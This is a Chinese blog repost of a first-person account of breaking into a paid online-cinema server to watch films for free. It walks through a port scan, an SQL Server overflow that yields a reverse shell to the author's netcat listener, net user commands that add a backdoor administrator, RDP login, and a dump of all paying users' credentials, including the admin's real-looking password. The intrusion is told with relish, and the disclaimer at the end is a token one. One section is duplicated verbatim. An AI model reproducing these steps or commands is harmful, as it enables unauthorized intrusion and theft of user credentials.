网站首页  注册会员  本站免费电影 留言板  繁體中文

 

您现在的位置: 陈鹏个人网站 >> 电脑应用 >> 网络应用 >> 网络安全 >> 正文
 

   
专 题 栏 目
相 关 文 章

全球黑客大赛战况:iPho
网络购物请提防十大“黑
Foxmail 6 防范黑客攻击
Foxmail防范黑客攻击两招
卡巴斯基:黑客攻击其在
倒计时器停滞 黑客完美破
黑客发现新的Vista激活破
免受骚扰 教您对付“QQ黑
盗窃QQ号及入侵系统必知
QQ文件共享漏洞入侵Win2

 
黑客入侵“在线影院”全过程           
黑客入侵“在线影院”全过程
作者:陈鹏 文章来源:eNet 点击数: 更新时间:2009-9-11 23:10:45
 




 

最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路。对我而言,入侵的过程是充满乐趣的,它刺激着我大脑的每一根神经,让我兴奋无比。我喜欢体味这种思维无拘放荡的快感,我喜欢沉醉其中。这是黑客营人的风格。于是,X-Scan开始勤恳地跑在了我的桌面上。

  破门:久违的溢出工具

  用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

  通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

  先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

  我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

  破门:久违的溢出工具

  用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

  通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

  先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

  我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

  遇阻:寻找VOD电影

  首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。

  可随后的情况让我呆住了,这台机器一共就C盘和D盘两个盘,容量加到一起也才20GB,这个容量是不可能装下上百部电影的,我要的VOD电影在哪里?

  电影文件一定是放在了另外一台机器上,而那台机器一定和这台Server是联网的。同时,经过我对“在线影院”网页文件的分析,也证实了这一点:电影文件不在本地,而是借助MS SQL的索引和归类来远程提取的。这本来就是一个IIS5.0+MS SQL的站点嘛。

  我又一次打开了“管理工具”,在里面的“DNS”里也发现了一个名叫“VOD”的节点,IP指向了一个与Server紧邻的地址,我要找的就是这个“VOD”了。考虑到Server和VOD之间密切的通讯关系,我很自然地打开了Server的“网上邻居”,果然不出所料,整个组里就两台机器,正是Server和VOD。双击VOD的图标,该死的系统又提示输入用户名和密码,看来网管在“网上邻居”上访问VOD时没有保存密码,我该到哪儿去找密码呢?

  得手:挖出VOD登录账号密码

  就在我准备彻底放弃的那一刹那,脑子里突然闪过一个念头:如果网管他自己要看电影怎么办呢?途径不外有二:一是直接在VOD上观看,二就是在server主页上输入他自己的账号密码进行观看。既然途径一我现在没法实现,那么途径二呢?就算网管是直接在VOD上操作文件,可至少在Server的网页上他应该有一个账号用来进行测试之用。

  接下来就是在Server这台机器中找账号密码了。直奔Server的MS SQL数据库。用3389登录Server,点击“开始”→“程序”→“Microsoft SQL Server”→“企业管理器”,然后在当前服务器名“Server”下打开“数据库”。发现一个名为“web_new”的可疑库,应该就是它了!打开它,选择其中的“表”,右边就列出了这个库里的所有表名,经过观察分析,锁定了一个名为“ZH_guanli”的表,先看看它的内容。鼠标右击它,选择“导出”→“导出所有行”。就那么一眨眼的工夫,Oh,My God,这不是账号是什么啊?所有的付费用户的账号密码都在这儿呢!呵呵,不好意思,我Copy了所有的列,然后保存到了我的本地机器中。这些账号的第一个就是admin,应该是网管的了,密码为wzl19750529。

  接下来擦干净了“脚印”,重新登录网页,输入网管的账号密码,终于看见电影顺利播放了,胜利!

  后记:

  入侵,是一个可深可浅的问题。我的大多数入侵都没有用上很高深的学问和知识。整个过程关键在于入侵者的思路和分析,能善于找出漏洞和利用漏洞,找出最简单有效的入侵方法,这才是黑客之道。还有,特别要提醒初学者,“入侵”并不等于“破坏”!大家要把握好这个度。

 

热门推荐: 免费电影与在线视频大搜捕 学习:全面了解 Blog 和 RSS


【责任编辑:李旭海】

文章录入:陈鹏    责任编辑:陈鹏 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     
     
     
     
     

    Copyright © 2007 - 2009 chenpeng123.com All Rights Reserved
    本站所有文章,软件等均来自网络收集,不代表本站观点,仅供学习和研究使用。如有侵犯您的版权,请联系我们,本站将立即删除。
    鲁ICP备07014697号
    你是本站第 位访客